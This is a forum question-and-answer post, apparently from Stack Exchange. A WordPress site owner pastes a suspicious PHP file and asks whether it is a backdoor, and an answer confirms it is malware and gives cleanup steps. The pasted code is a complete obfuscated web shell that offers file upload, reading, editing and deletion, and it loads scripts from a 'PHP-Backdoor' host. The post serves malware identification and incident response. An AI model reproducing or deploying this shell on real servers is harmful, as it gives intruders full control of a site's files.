phpwordpressmalware-detection

Is that malware?

i found a file with the code given below in my public_html.it is a wordpress website.is it a malware or backdoor?Can i identify how this code was injected from this file?

<?php /* 0 b y t 3 m 1 n 1 - 2.2 - Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell */ set_time_limit(0); error_reporting(0); error_log(0); $sname = "\x30\x62\x79\x74\x33\x6d\x31\x6e\x31" . "-V2"; $__gcdir = "\x67" . "\x65\x74\x63\x77\x64"; $__fgetcon7s = "\x66\x69\x6c\x65" . "\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"; $__scdir = "s" . "\x63\x61\x6e\x64\x69" . "r"; $rm__dir = "\x72\x6d\x64" . "ir"; $un__link = "\x75\x6e" . "\x6c\x69\x6e\x6b"; if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } echo '<!DOCTYPE html><html><head><link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet"><title>'.$sname.'</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script><link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css"></head><body>'; echo '<div style="color:#ef6c00;margin-top:0;"><h1><center>' . $sname . '</center></h1></div>'; if (isset($_GET['path'])) { $path = $_GET['path']; chdir($_GET['path']); } else { $path = $__gcdir(); } $path = str_replace("\\", "/", $path); $paths = explode("/", $path); echo '<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>'; echo "<font style='font-size:13px;'>Path: "; foreach ($paths as $id => $pat) { echo "<a style='font-size:13px;' href='?path="; for ($i = 0; $i <= $id; $i++) { echo $paths[$i]; if ($i != $id) { echo "/"; } } echo "'>$pat</a>/"; } echo '<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">'; if (isset($_FILES['file'])) { if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) { echo '<center><font color="#00ff00">Upload OK!</font></center><br/>'; } else { echo '<center><font color="red">Upload FAILED!</font></center><br/>'; } } echo '</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">'; echo ''; if (isset($_GET['filesrc'])) { echo '<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: '; echo "" . basename($_GET['filesrc']); ""; echo '</tr></td></table><br />'; echo ("<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . "</textarea></center>"); } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') { echo '</table><br /><center>' . $_POST['path'] . '<br /><br />'; if ($_POST['opt'] == 'rename') { if (isset($_POST['newname'])) { if (rename($_POST['path'], $path . '/' . $_POST['newname'])) { echo '<center><font color="#00ff00">Rename OK!</font></center><br />'; } else { echo '<center><font color="red">Rename Failed!</font></center><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>'; } elseif ($_POST['opt'] == 'edit') { if (isset($_POST['src'])) { $fp = fopen($_POST['path'], 'w'); if (fwrite($fp, $_POST['src'])) { echo '<center><font color="#00ff00">Edit File OK!.</font></center><br />'; } else { echo '<center><font color="red">Edit File Failed!.</font></center><br />'; } fclose($fp); } echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>'; } echo '</center>'; } else { echo '</table><br /><center>'; if (isset($_GET['option']) && $_POST['opt'] == 'delete') { if ($_POST['type'] == 'dir') { if ($rm__dir($_POST['path'])) { echo '<center><font color="#00ff00">Dir Deleted!</font></center><br />'; } else { echo '<center><font color="red">Delete Dir Failed!</font></center><br />'; } } elseif ($_POST['type'] == 'file') { if ($un__link($_POST['path'])) { echo '<font color="#00ff00">Delete File Done.</font><br />'; } else { echo '<font color="red">Delete File Error.</font><br />'; } } } echo '</center>'; $_scdir = $__scdir($path); echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>'; foreach ($_scdir as $dir) { if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr><td>[D] <a href=\"?path=$path/$dir\">$dir</a></td><td><center>--</center></td><td><center>"; if (is_writable("$path/$dir")) echo '<font color="#00ff00">'; elseif (!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if (is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$dir")) . ""; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"$dir\"><input type=\"hidden\" name=\"path\" value=\"$path/$dir\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>"; } foreach ($_scdir as $file) { if (!is_file("$path/$file")) continue; $size = filesize("$path/$file") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . ' MB'; } else { $size = $size . ' KB'; } echo "<tr><td>[F] <a href=\"?filesrc=$path/$file&path=$path\">$file</a></td><td><center>" . $size . "</center></td><td><center>"; if (is_writable("$path/$file")) echo '<font color="#00ff00">'; elseif (!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if (is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("$path/$file")) . ""; echo "</center></td><td><center><form method=\"POST\" action=\"?option&path=$path\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"$file\"><input type=\"hidden\" name=\"path\" value=\"$path/$file\"><input type=\"submit\" value=\"+\" /></form></center></td></tr>"; } echo '</table></div>'; } function perms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } echo '<br><center>&copy; <span id="footer"></span> 2018.</center><br>'; echo '<script type="text/javascript" src="//zerobyte-id.github.io/PHP-Backdoor/inc/footer.js"></script>'; echo '</body></html><!-- EOF -->'; ?>
Solution

  • As stated in the comments, the line is malware. It's possible there are other files on your server affected as well, so I would scan the date modified on them to see if any have been changed around the same time that file was created. This becomes much easier if you have SSH access and are able to use find.

    Identifying the source of the attack is trickier. I would start by looking at the file you pointed out - which user created it? The server itself or an FTP user? Then I would talk to the web host about it.

    Finally, I would change all admin WordPress passwords to be on the safe side. Might want to change your cpanel user's password as well.